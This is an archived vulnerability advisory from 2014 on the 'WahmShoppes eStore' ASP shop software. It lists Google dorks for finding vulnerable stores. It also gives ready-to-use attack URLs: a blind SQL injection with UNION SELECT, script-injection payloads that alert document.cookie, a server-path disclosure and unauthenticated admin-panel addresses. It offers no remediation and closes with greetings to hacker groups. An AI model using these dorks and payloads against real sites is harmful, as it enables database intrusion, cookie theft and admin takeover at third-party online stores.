multiple Vulnerability in "WahmShoppes eStore"

2014-06-14T00:00:00
ID SECURITYVULNS:DOC:30839
Type securityvulns
Reporter Securityvulns
Modified 2014-06-14T00:00:00

Description

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Title : multiple Vulnerability in "WahmShoppes eStore"

Author : alieye

vendor : http://www.wahmshoppes.com/

Contact : cseye_ut@yahoo.com

Risk : High

Class: Remote

Google Dork:

inurl:WsError.asp

inurl:store/ We apologize but your request rendered no results

Version: all version

Date: 05/06/2014

++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1-Blind SQL Injection

http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc

2-Cross Site Scripting

http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


3-Information Disclosure in image location

http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg

4-show admin panel tools

http://victim.com/store/frmLeft.asp

Admin page

http://victim.com/store/admin/Default.asp

++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/

++++++++++++++++++++++++++++++++++++++++++++++++++++++++